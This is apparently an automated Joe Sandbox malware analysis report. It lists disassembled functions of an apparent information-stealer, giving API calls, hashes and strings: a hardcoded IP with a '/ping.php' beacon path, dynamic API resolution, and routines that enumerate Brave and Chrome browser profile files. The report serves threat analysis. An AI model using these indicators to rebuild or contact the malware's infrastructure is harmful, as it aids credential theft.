Instruction ID: b6a7b7f1346c6beea8c67b5d99944fa9cd6f8cd40e1ef7b77cf0678c1b25a94a
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 2A01A572A055156BEB05DF59DC40FAEB7AAFF44715F10012EF80AD7240D3709A408AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

185.172.128.228, xrefs: 0040357B
/ping.php?substr=%s, xrefs: 0040357C

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 024FA93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 024FA9D1
GetLastError.KERNEL32 ref: 024FA9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 024FAA3A

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction ID: ef5a7930ecf2499f565d62574e40426975b5ae02baf0d85155da432f2af5ce23
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: 7E410730A00326AFCF61CFA5C944BBB7BA5DF85324F15416BFA5DAB2A0D7309905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u5g0.0.exePID: 5408, Parent PID: 7056COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02F4FFE0), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,02F50220), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,02F51640), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,02F51658), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,02F51670), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,02F515C8), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,02F4EDA0), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,02F515E0), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,02F51610), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,02F51628), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,02F54A68), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,02F4FEA0), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,02F4FFC0), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,02F50020), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,02F50140), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,02F54B40), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,02F54D08), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,02F4ED78), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,02F50040), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,02F54A80), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,02F54BB8), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,02F54C18), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,02F54CD8), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,02F50060), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,02F54CF0), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,02F54B70), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,02F54C00), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,02F54B88), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,02F54D20), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,02F54C60), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,02F54C78), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,02F54CA8), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,02F54C48), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,02F31D58), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,02F54CC0), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,02F54B28), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,02F50160), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,02F54A38), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,02F50180), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,02F54C30), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,02F54BA0), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,02F501A0), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,02F501C0), ref: 0041665B
LoadLibraryA.KERNEL32(02F54AC8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(02F54BD0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(02F54AE0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(02F54BE8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(02F54A50,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(02F54A98,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(02F54AB0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(02F54AF8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,02F50240), ref: 0041670A
GetProcAddress.KERNEL32(75290000,02F54B10), ref: 00416722
GetProcAddress.KERNEL32(75290000,02F519E8), ref: 0041673A
GetProcAddress.KERNEL32(75290000,02F54B58), ref: 00416753
GetProcAddress.KERNEL32(75290000,02F505C0), ref: 0041676B
GetProcAddress.KERNEL32(6FCD0000,02F4E8F0), ref: 00416790
GetProcAddress.KERNEL32(6FCD0000,02F50320), ref: 004167A9
GetProcAddress.KERNEL32(6FCD0000,02F4E918), ref: 004167C1
GetProcAddress.KERNEL32(6FCD0000,02F54C90), ref: 004167D9
GetProcAddress.KERNEL32(6FCD0000,02F54D80), ref: 004167F2
GetProcAddress.KERNEL32(6FCD0000,02F50560), ref: 0041680A
GetProcAddress.KERNEL32(6FCD0000,02F502A0), ref: 00416822
GetProcAddress.KERNEL32(6FCD0000,02F54D50), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,02F50380), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,02F50580), ref: 00416874
GetProcAddress.KERNEL32(752C0000,02F54D68), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,02F54DE0), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,02F502E0), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,02F4E990), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,02F4E9E0), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,02F54D98), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,02F50360), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,02F50280), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,02F4EB20), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,02F54DB0), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,02F503A0), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,02F51A58), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,02F54DC8), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,02F54DF8), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,02F502C0), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,02F50440), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,02F54D38), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,02F54FC0), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,02F503C0), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,02F54F48), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,02F55110), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,02F55008), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,02F54F60), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,02F50460), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,02F50260), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,02F50300), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,02F55038), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,02F504E0), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,02F505A0), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,02F50500), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,02F54EA0), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,02F504A0), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,02F505E0), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,02F50340), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,02F503E0), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,02F54F90), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,02F51A38), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,02F55050), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,02F54EB8), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,02F50400), ref: 00416C96
GetProcAddress.KERNEL32(6CBC0000,02F54F00), ref: 00416CB7
GetProcAddress.KERNEL32(6CBC0000,02F50420), ref: 00416CCF
GetProcAddress.KERNEL32(6CBC0000,02F54F30), ref: 00416CE8
GetProcAddress.KERNEL32(6CBC0000,02F55020), ref: 00416D00

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s\%s\%s, xrefs: 004117DB
%s%s, xrefs: 00411838
%s\%s, xrefs: 00411714
%s\%s, xrefs: 004117FD
%s\*, xrefs: 0041165D

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNEL32(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Google Chrome, xrefs: 0040BDB9
\Brave\Preferences, xrefs: 0040B97B
Preferences, xrefs: 0040B8BE
Brave, xrefs: 0040B8A2

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: fdfa31c02fe99afed476d29fafef40d91370e399f78d2197f359c4fe8cc9d941
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: fdfa31c02fe99afed476d29fafef40d91370e399f78d2197f359c4fe8cc9d941
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F
%s\*, xrefs: 0041257D

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 897a564c11951e8a6d6790526e3f30010550164459797f66fddc39be840b81f3
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: 897a564c11951e8a6d6790526e3f30010550164459797f66fddc39be840b81f3
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 21f5310ec534ceb6944fe5a0537db6634ce4df716d51aec53398ff0356a3697c
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: 21f5310ec534ceb6944fe5a0537db6634ce4df716d51aec53398ff0356a3697c
